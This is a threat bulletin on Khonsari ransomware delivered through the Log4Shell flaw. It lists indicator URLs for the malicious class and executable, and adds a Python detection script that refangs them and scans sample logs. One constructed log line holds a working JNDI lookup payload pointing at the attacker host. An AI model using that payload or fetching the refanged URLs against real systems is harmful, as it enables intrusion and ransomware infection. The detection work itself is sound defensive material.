Khonsari Ransomware Deployed by the Log4Shell Vulnerability

A new ransomware family named Khonsari, which targets Windows servers, has recently been discovered being deployed through the Log4Shell vulnerability.

The exploit loads Java bytecode from hxxp://3.145.115[.]94/Main.class via a JNDI lookup; that class then downloads the Khonsari ransomware from hxxp://3.145.115[.]94/zambo/groenhuyzen.exe.

The ransomware encrypts files with AES-128 in CBC mode and appends the extension .khonsari to each encrypted file.
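The chain above gives a defender three things to look for: a JNDI lookup string in inbound request data, outbound contact with the host that served Main.class and the payload, and files gaining the .khonsari extension. The following Python is an added illustration, not code from the bulletin or from Cado Security; it refangs the published indicators, runs a minimal check over constructed sample log lines and a constructed file listing, and reports what fired. The log lines, paths and the `triage` helper are assumptions for the example.

```python
import re
from urllib.parse import urlparse

# Indicators quoted in the bulletin above, kept in the defanged form in which
# they were published (hxxp, [.]) so they cannot be clicked by accident.
DEFANGED_IOCS = [
    "hxxp://3.145.115[.]94/Main.class",
    "hxxp://3.145.115[.]94/zambo/groenhuyzen.exe",
]
RANSOM_EXTENSION = ".khonsari"

# Marker of a Log4Shell lookup attempt in request data (header, URI, body).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def refang(ioc):
    """Turn a defanged indicator back into the literal string seen in logs."""
    return (ioc.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", "."))


IOC_URLS = [refang(u) for u in DEFANGED_IOCS]
IOC_HOSTS = sorted({urlparse(u).hostname for u in IOC_URLS})


def scan_log_line(line):
    """Return the detections that fire on one log line (empty list if clean)."""
    findings = []
    if JNDI_RE.search(line):
        findings.append("jndi_lookup")
    for host in IOC_HOSTS:
        if host in line:
            findings.append("ioc_host:" + host)
    return findings


def find_encrypted_files(paths):
    """Return paths carrying the extension Khonsari appends after encryption."""
    return [p for p in paths if p.lower().endswith(RANSOM_EXTENSION)]


# Constructed sample data (not real captured logs): one access-log line with a
# JNDI lookup in the User-Agent pointing at the bulletin's host, one clean line,
# and one simplified proxy line recording a fetch of the payload URL.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://3.145.115.94/x}"',
    '198.51.100.8 - - [13/Dec/2021:09:14:05 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    "2021-12-13T09:14:09Z proxy GET http://3.145.115.94/zambo/groenhuyzen.exe 200",
]
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\budget.xlsx.khonsari",
    r"C:\Users\alice\Documents\notes.txt",
]


def triage(log_lines=SAMPLE_LOG, paths=SAMPLE_PATHS):
    """Summarise hits across a batch of log lines and a file listing."""
    hits = {}
    for i, line in enumerate(log_lines):
        findings = scan_log_line(line)
        if findings:
            hits[i] = findings
    return {"log_hits": hits, "encrypted_files": find_encrypted_files(paths)}


if __name__ == "__main__":
    print(triage())
```

The `${jndi:` pattern only catches the plain form of the lookup string; production detection should also cover the string-substitution variants Log4j accepts, and the host match should be treated as a starting point, since the infrastructure behind an indicator changes over time.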

REFERENCES:

https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/
